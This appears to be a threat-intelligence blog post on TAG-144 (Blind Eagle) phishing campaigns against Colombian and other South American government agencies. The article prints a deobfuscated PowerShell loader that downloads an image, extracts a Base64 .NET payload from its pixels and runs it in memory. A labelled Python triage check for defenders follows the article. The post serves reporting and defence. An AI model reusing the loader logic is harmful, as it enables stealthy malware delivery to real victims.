Cyber Web Spider Blog – News
TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures

Posted on August 28, 2025 by CWS

Over the past year, a shadowy threat actor known as TAG-144, also tracked under the aliases Blind Eagle and APT-C-36, has intensified operations against South American government institutions.

First observed in 2018, the group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm, typically delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.

In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters deploying new infrastructure and abusing legitimate internet services to stage malware payloads.

Initial access typically relies on compromised or spoofed email accounts belonging to local government agencies, luring users into opening malicious documents or SVG attachments.

These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services such as Paste.ee or Discord's CDN.

Recorded Future researchers identified numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary's ability to combine social engineering with technical subterfuge.

Phishing pages linked to Cluster 4 (Source: Recorded Future)

The impact of TAG-144's campaigns has been most severe in Colombia's federal and municipal agencies, where the exfiltration of credentials and sensitive data poses both espionage and financial extortion risks.

Although the clusters share core tactics (dynamic DNS domains, open-source RATs, and stolen crypters), the group's evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.

Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.

Infection Mechanism and Steganographic Payload Extraction

One of TAG-144's most sophisticated techniques involves embedding a Base64-encoded .NET assembly within the pixel data of a benign JPEG image hosted on Archive[.]org.

Payload hosted on an archive[.]org URL (Source: Recorded Future)

Upon execution of the initial PowerShell script, the loader scans the download for a predefined byte marker before extracting and invoking the payload directly in memory, bypassing disk writes and evading antivirus detection.

For example, the deobfuscated PowerShell segment responsible for this process appears as:

$tormodont = ''   # URL of the hosted image (omitted in the published snippet)
$sclere = New-Object System.Net.WebClient
$sclere.Headers.Add('User-Agent', 'Mozilla/5.0')
$sorority = $sclere.DownloadData($tormodont)
# Identify the marker and extract the embedded bytes ($markerIndex is set earlier in the script, not shown)
$splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]
$stream = New-Object IO.MemoryStream
$stream.Write($splenoncus, 0, $splenoncus.Length)
$bitmap = [Drawing.Bitmap]::FromStream($stream)
# Reconstruct the payload from pixel data: R, G, B of every pixel in raster order ($bytesList is a byte list created earlier)
foreach ($y in 0..($bitmap.Height - 1)) {
    foreach ($x in 0..($bitmap.Width - 1)) {
        $colour = $bitmap.GetPixel($x, $y)
        $bytesList.Add($colour.R); $bytesList.Add($colour.G); $bytesList.Add($colour.B)
    }
}
# Skip the leading 4 bytes, Base64-decode the next $length bytes and run the assembly in memory
$payloadBytes = [Convert]::FromBase64String($bytesList[4..($length + 3)] -join '')
[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null, $args)

This in-memory injection, coupled with dynamic domain resolution that often relies on services such as duckdns.org and noip.com, ensures that the RAT's command-and-control infrastructure remains agile and difficult to trace.

By avoiding conventional executable downloads and employing steganography, TAG-144 demonstrates a sophisticated understanding of both detection evasion and asset staging, posing a persistent threat to government networks across the region.
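A defender-side triage check for the technique described above, added here as an example and not part of the original article or of Recorded Future's reporting: it flags a downloaded image that carries extra data after the JPEG end-of-image marker, and tests whether the concatenated RGB channel bytes of a decoded image follow the loader's layout and decode to a Base64-encoded PE (MZ) payload. The 4-byte little-endian length prefix, the function names and the constructed sample image are assumptions; the article's snippet shows only the slice [4..($length+3)].

```python
import base64
import binascii
import struct

JPEG_EOI = b"\xff\xd9"  # JPEG End-Of-Image marker

def trailing_data_after_eoi(data: bytes) -> bytes:
    """Return whatever follows the last JPEG End-Of-Image marker.
    A clean JPEG ends at FF D9; a bulky tail is the first thing to look at
    when a loader scans a download for a marker before handing the rest
    to Bitmap.FromStream."""
    idx = data.rfind(JPEG_EOI)
    return b"" if idx == -1 else data[idx + 2:]

def flatten_rgb(pixels):
    """Concatenate R,G,B of every pixel in raster order, as the loader does."""
    return bytes(channel for px in pixels for channel in px)

def carve_base64_payload(rgb: bytes):
    """Mirror the snippet's index arithmetic: bytes 0-3 carry a length,
    bytes 4..length+3 carry Base64 text. The 4-byte little-endian length
    is an assumption; the page only shows the slice [4..($length+3)].
    Returns the decoded bytes, or None when the data does not fit."""
    if len(rgb) < 4:
        return None
    length = struct.unpack("<I", rgb[:4])[0]
    if length == 0 or length + 4 > len(rgb):
        return None
    try:
        return base64.b64decode(rgb[4:4 + length], validate=True)
    except (binascii.Error, ValueError):
        return None

def looks_like_pe(blob) -> bool:
    """A .NET assembly is a PE file, so the carved bytes should start 'MZ'."""
    return blob is not None and blob[:2] == b"MZ"

def build_constructed_sample():
    """Constructed test input: a fake 'assembly' (an MZ header plus filler,
    not real code) packed the way the loader expects, padded with zero
    pixels; and a plain zero-pixel image of the same size for comparison."""
    fake_payload = b"MZ" + b"\x00" * 6 + b"constructed filler, not a real assembly"
    b64 = base64.b64encode(fake_payload)
    channel_bytes = struct.pack("<I", len(b64)) + b64
    channel_bytes += b"\x00" * (-len(channel_bytes) % 3)
    stego_pixels = [tuple(channel_bytes[i:i + 3]) for i in range(0, len(channel_bytes), 3)]
    stego_pixels += [(0, 0, 0)] * 8
    clean_pixels = [(0, 0, 0)] * len(stego_pixels)
    return stego_pixels, clean_pixels

def image_carries_assembly(pixels) -> bool:
    """Triage verdict for one decoded image: True if its channel bytes carve to a PE."""
    return looks_like_pe(carve_base64_payload(flatten_rgb(pixels)))
```

With a real file, decode the image with an imaging library and pass its pixel list to image_carries_assembly; a hit or a non-empty trailing tail is a reason to quarantine the download and the script that fetched it.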
